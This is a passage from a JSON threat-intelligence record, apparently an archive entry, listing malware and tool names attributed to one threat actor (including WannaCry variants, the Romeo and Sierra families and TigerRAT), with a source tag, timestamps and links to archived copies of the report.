"ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434016, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d23c311546282942a68abe406ebf2ee8c2c7fed6.pdf", "text": "https://archive.orkl.eu/d23c311546282942a68abe406ebf2ee8c2c7fed6.txt", "img": "https://archive.orkl.eu/d23c311546282942a68abe406ebf2ee8c2c7fed6.jpg" } }